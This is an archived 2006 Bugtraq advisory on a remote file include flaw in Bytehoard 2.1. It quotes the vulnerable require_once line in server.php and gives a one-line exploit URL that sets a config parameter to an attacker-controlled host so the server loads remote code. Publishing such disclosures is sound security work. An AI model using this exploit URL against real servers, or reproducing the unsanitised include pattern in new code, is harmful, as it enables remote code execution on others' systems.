[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Bytehoard 2.1 Remote File Include

To: bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx
Subject: Bytehoard 2.1 Remote File Include
From: beford <xbefordx@xxxxxxxxx>
Date: Thu, 1 Jun 2006 22:36:24 -0500

Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]


http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker

Prev by Date: PHP ManualMaker v1.0
Next by Date: Re: Jiwa Financials - Reporting allows execution of arbitrary reports as SQL user with full permissions.
Previous by thread: PHP ManualMaker v1.0
Next by thread: Re: Jiwa Financials - Reporting allows execution of arbitrary reports as SQL user with full permissions.
Index(es):
- Date
- Thread